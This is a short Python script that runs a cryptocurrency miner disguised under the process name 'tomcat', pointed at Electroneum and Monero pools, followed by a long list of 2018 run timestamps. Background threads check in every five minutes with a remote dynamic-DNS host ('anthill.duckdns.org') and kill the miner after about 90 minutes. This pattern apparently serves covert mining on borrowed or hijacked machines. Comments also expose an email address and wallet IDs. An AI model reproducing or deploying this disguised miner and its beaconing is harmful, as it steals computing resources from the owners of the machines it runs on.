import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:13:02.006409
#2018-02-17 17:01:07.414030
#2018-02-17 18:49:05.744123
#2018-02-17 20:37:01.685166
#2018-02-17 22:22:06.432401
#2018-02-18 00:06:04.212168
#2018-02-18 01:56:04.307899
#2018-02-18 03:44:06.920487
#2018-02-18 05:32:01.905169
#2018-02-18 07:24:04.242610
#2018-02-18 09:12:02.064916
#2018-02-18 10:58:07.391849
#2018-02-18 12:46:04.701402
#2018-02-18 14:33:07.266086
#2018-02-18 16:23:03.313556
#2018-02-18 18:12:04.691145
#2018-02-18 19:58:06.096538
#2018-02-18 21:45:06.764118
#2018-02-18 23:33:06.993370
#2018-02-19 01:19:01.948176
#2018-02-19 03:07:04.598452
#2018-02-19 04:53:04.150603
#2018-02-19 06:39:06.162985
#2018-02-19 08:29:01.815982
#2018-02-19 10:18:02.054876
#2018-02-19 12:05:10.103115
#2018-02-19 13:51:06.190824
#2018-02-19 15:41:08.703859
#2018-02-19 17:27:09.640728
#2018-02-19 19:16:09.006476
#2018-02-19 21:05:09.327952
#2018-02-19 22:51:05.604152
#2018-02-20 00:36:07.993804
#2018-02-20 02:25:08.077816
#2018-02-20 04:15:06.906137
#2018-02-20 05:58:05.050564
#2018-02-20 07:44:05.386860
#2018-02-20 09:29:06.591329
#2018-02-20 11:13:06.886482
#2018-02-20 13:01:01.238711
#2018-02-20 14:45:09.233993
#2018-02-20 16:27:09.534546
#2018-02-20 18:14:01.377781
#2018-02-20 20:05:06.527254
#2018-02-20 21:52:04.392983
#2018-02-20 23:33:07.693788
#2018-02-21 01:18:07.506245
#2018-02-21 03:07:04.582271
#2018-02-21 04:54:03.891159
#2018-02-21 06:42:05.808297
#2018-02-21 08:27:06.435330
#2018-02-21 10:12:08.052048
#2018-02-21 12:02:08.410852
#2018-02-21 13:50:05.045726
#2018-02-21 15:28:03.985143
#2018-02-21 17:19:09.543397
#2018-02-21 19:08:04.136055
#2018-02-21 20:56:04.284235
#2018-02-21 22:42:05.221919
#2018-02-22 00:31:06.114456
#2018-02-22 02:19:01.312681
#2018-02-22 04:06:05.047877
#2018-02-22 05:51:06.536337
#2018-02-22 07:38:05.733997
#2018-02-22 09:26:07.295333
#2018-02-22 11:11:06.743903
#2018-02-22 12:56:05.551558
#2018-02-22 14:43:01.595717
#2018-02-22 16:27:01.802865
#2018-02-22 18:14:08.543899
#2018-02-22 20:06:08.815890
#2018-02-22 21:54:05.321365
#2018-02-22 23:41:06.410391
#2018-02-23 01:28:01.967869
#2018-02-23 03:14:06.802505
#2018-02-23 05:01:05.420917
#2018-02-23 06:46:04.118759
#2018-02-23 08:34:04.944328
#2018-02-23 10:48:07.405130
#2018-02-23 12:44:06.325795
#2018-02-23 14:28:08.079057
#2018-02-23 16:19:07.021188
#2018-02-23 18:05:01.870723
#2018-02-23 19:51:02.168788
#2018-02-23 21:34:06.512286
#2018-02-23 23:21:05.437653
#2018-02-24 01:11:07.115373
#2018-02-24 03:03:06.433814
#2018-02-24 04:50:01.268503
#2018-02-24 06:28:04.007473
#2018-02-24 08:17:01.906043
#2018-02-24 10:01:01.995695
#2018-02-24 11:59:02.112244
#2018-02-24 13:47:01.276529
#2018-02-24 15:36:04.632199
#2018-02-24 17:31:04.948926
#2018-02-24 19:18:05.851967
#2018-02-24 21:07:05.150676
#2018-02-24 23:41:03.948407
#2018-02-25 03:02:03.779627
#2018-02-25 06:54:06.795492